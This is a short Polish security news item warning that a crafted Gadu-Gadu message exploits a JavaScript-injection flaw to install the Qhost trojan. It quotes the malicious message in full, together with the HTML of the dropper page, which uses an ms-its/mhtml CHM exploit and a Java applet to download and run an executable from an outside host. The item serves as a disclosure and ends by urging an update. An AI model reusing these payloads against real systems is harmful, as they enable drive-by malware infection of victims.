Exploit rozsyłany w sieci Gadu-Gadu

Cztery dni temu informowaliśmy o kolejnych błędach w komunikatorze Gadu-Gadu. Jeden z nich pozwalał między innymi na wykonanie kodu javascript w strefie lokalnej poprzez wysłanie odpowiednio spreparowanej wiadomości. W dniu dzisiejszym w sieci Gadu-Gadu rozsyłana jest wiadomość której odebranie powoduje instalacje trojana Qhost.

Wiadomość rozsyłana jest z bramki WWW – GG o numerze 7021349. Oto jej treść:

www.po”style=background-image:url(javascript:window.open(‚http://iframedollars.biz/dl/adv407.php’,”,’left=10000′));”.pl

W pliku adv407.php znajduje się kod HTML:

<html><head>
</head><body>
<textarea cd=”cxw” style=”display:none;” >
<object data=”${PR}” type=”text/x-scriptlet”></object>
</textarea>

<script language=”javascript”>
document.write(cxw.value.replace(/\${PR}/g,’ms-its:mhtml:file://c:\\nosuch.mht!http://iframedollars.biz/dl/adv407/x.chm::/x.htm’));
</script>
<applet width=1 height=1 ARCHIVE=loaderadv407.jar code=Counter></APPLET></body></html>

Aplet zapisany w archiwum loaderadv407.jar pobiera program http://iframedollars.biz/dl/loadadv407.exe i instaluje go na komputerze ofiary. Loadadv407.exe przez skaner Mks’a identyfikowany jest jako Trojan.Qhost.

Zalecamy niezwłoczną aktualizacje do najnowszej wersji klienta Gadu-Gadu bądź skorzystanie z alternatywnych klientów.